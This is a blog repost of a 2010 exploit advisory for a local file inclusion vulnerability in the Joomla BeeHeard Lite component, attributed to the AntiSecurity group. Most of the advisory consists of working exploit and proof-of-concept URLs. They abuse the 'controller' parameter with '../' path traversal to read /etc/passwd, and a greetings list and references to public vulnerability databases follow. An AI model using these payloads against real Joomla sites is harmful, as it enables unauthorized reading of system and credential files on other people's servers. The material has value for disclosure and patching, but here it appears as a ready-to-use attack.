/home/mb3e/

♺ Google is the best teacher ♺ | University of Gunadarma IT ☺

Joomla Component BeeHeard Lite Local File Inclusion Vulnerability

Advisory Content : 

===========================================================================
=======================================


[o] Joomla Component BeeHeard Lite Local File Inclusion Vulnerability

Software : com_beeheard version 1.0
Vendor : http://beeheard.cmstactics.com
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/


===========================================================================
=======================================


[o] Exploit


http://localhost/[path]/index.php?option=com_beeheard&controller=[LFI]
<< Old version

http://localhost/[path]/index.php?option=com_beeheardlite&controller=[LFI]
<< New version


[o] PoC


http://localhost/index.php?option=com_beeheard&controller=../../../../../..
/../../../../etc/passwd

http://localhost/index.php?option=com_beeheardlite&controller=../../../../.
./../../../../../etc/passwd


===========================================================================
=======================================


[o] Greetz

Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11


===========================================================================
=======================================


[o] April 14 2010 - GMT +07:00 Jakarta, Indonesia

Arrow  References :

http://xforce.iss.net/xforce/xfdb/57845
http://www.securityfocus.com/bid/39506
http://www.exploit-db.com/exploits/12239
http://secunia.com/advisories/39475
http://packetstormsecurity.org/1004-exploits/joomlabeeheardlite-lfi.txt
  • Joomla Component BeeHeard Lite Local File Inclusion Vulnerability
  • Unknown
  • May 25, 2010
  • No comments:
 

0 comments:

Post a Comment

silahkan tinggalkan komentar anda disini .. :D

Subscribe to: Post Comments (Atom)